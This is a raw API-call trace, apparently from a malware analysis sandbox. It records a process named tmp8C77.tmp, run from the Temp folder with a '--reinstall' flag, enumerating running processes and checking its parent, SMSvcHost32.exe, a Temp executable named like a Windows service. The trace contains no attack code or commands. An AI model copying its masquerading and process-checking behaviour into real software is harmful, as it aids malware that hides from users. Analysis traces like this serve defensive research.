	[0086.132] LocalFree (hMem=0x7f3348) returned 0x0
	[0086.132] CloseHandle (hObject=0x1ec) returned 1
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.132] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] GetLastError () returned 0x0
	[0086.133] StrStrIW (lpFirst="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" --reinstall", lpSrch="--reinstall") returned="--reinstall"
	[0086.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x421b10, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec
	[0086.133] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0xffffffff) 

Thread:
	id = 88
	os_tid = 0xb70

	[0086.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4
	[0086.187] GetCurrentProcessId () returned 0xe6c
	[0086.187] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0086.188] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0086.188] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0086.189] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0086.190] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0086.190] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0086.191] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0086.192] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0086.192] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0086.193] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.193] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.194] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0086.195] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.196] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.196] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.197] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.198] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.198] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.199] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.199] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0086.200] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1
	[0086.201] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.201] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x650, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1
	[0086.202] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1
	[0086.202] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.203] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0086.204] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0086.204] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0086.205] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1
	[0086.206] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1
	[0086.206] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0086.207] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0086.208] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0086.208] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.209] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1
	[0086.210] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0086.210] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="develop-patent.exe")) returned 1
	[0086.211] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="its.exe")) returned 1
	[0086.211] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gently budapest.exe")) returned 1
	[0086.212] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thoroughlypriestprefix.exe")) returned 1
	[0086.213] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inserted_field.exe")) returned 1
	[0086.213] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="semi bay.exe")) returned 1
	[0086.214] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outdoor.exe")) returned 1
	[0086.214] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wool-parish-horses.exe")) returned 1
	[0086.215] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoken-delayed.exe")) returned 1
	[0086.317] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spokesman.exe")) returned 1
	[0086.317] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oxide.exe")) returned 1
	[0086.318] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="off-covered-playlist.exe")) returned 1
	[0086.318] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bryant.exe")) returned 1
	[0086.319] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="postal-fool.exe")) returned 1
	[0086.319] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crm_remarks_ctrl.exe")) returned 1
	[0086.320] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="volunteer.exe")) returned 1
	[0086.321] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranger_tu_community.exe")) returned 1
	[0086.321] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddie_cholesterol_reprint.exe")) returned 1
	[0086.322] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bracket-natural-chancellor.exe")) returned 1
	[0086.322] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="safari.exe")) returned 1
	[0086.323] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0086.323] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xff8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0086.324] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.325] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0086.325] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0086.326] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp8C77.tmp")) returned 1
	[0086.327] GetModuleHandleA (lpModuleName="kernel32") returned 0x765a0000
	[0086.327] GetProcAddress (hModule=0x765a0000, lpProcName="QueryFullProcessImageNameW") returned 0x765e1b70
	[0086.327] OpenProcess (dwDesiredAccess=0x100410, bInheritHandle=0, dwProcessId=0xdb0) returned 0x1f8
	[0086.327] QueryFullProcessImageNameW (in: hProcess=0x1f8, dwFlags=0x0, lpExeName=0x263fa64, lpdwSize=0x263f840 | out: lpExeName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpdwSize=0x263f840) returned 1
	[0086.327] CloseHandle (hObject=0x1f8) returned 1
	[0086.328] PathFindFileNameW (pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="SMSvcHost32.exe"
	[0086.328] StrCpyW (in: psz1=0x263fe98, psz2="SMSvcHost32.exe" | out: psz1="SMSvcHost32.exe") returned="SMSvcHost32.exe"
	[0086.328] StrCpyW (in: psz1=0x263f85c, psz2="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" | out: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0086.328] StrCatW (in: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", psz2="-" | out: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe-") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe-"
	[0086.328] CloseHandle (hObject=0x1f4) returned 1
	[0086.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4
	[0086.333] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0086.334] StrCmpIW (psz1="SMSvcHost32.exe", psz2="[System Process]") returned 1
	[0086.334] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0086.334] StrCmpIW (psz1="SMSvcHost32.exe", psz2="System") returned -1
	[0086.335] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0086.335] StrCmpIW (psz1="SMSvcHost32.exe", psz2="smss.exe") returned 1
	[0086.335] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0086.336] StrCmpIW (psz1="SMSvcHost32.exe", psz2="csrss.exe") returned 1
	[0086.336] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0086.336] StrCmpIW (psz1="SMSvcHost32.exe", psz2="wininit.exe") returned -1
	[0086.336] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
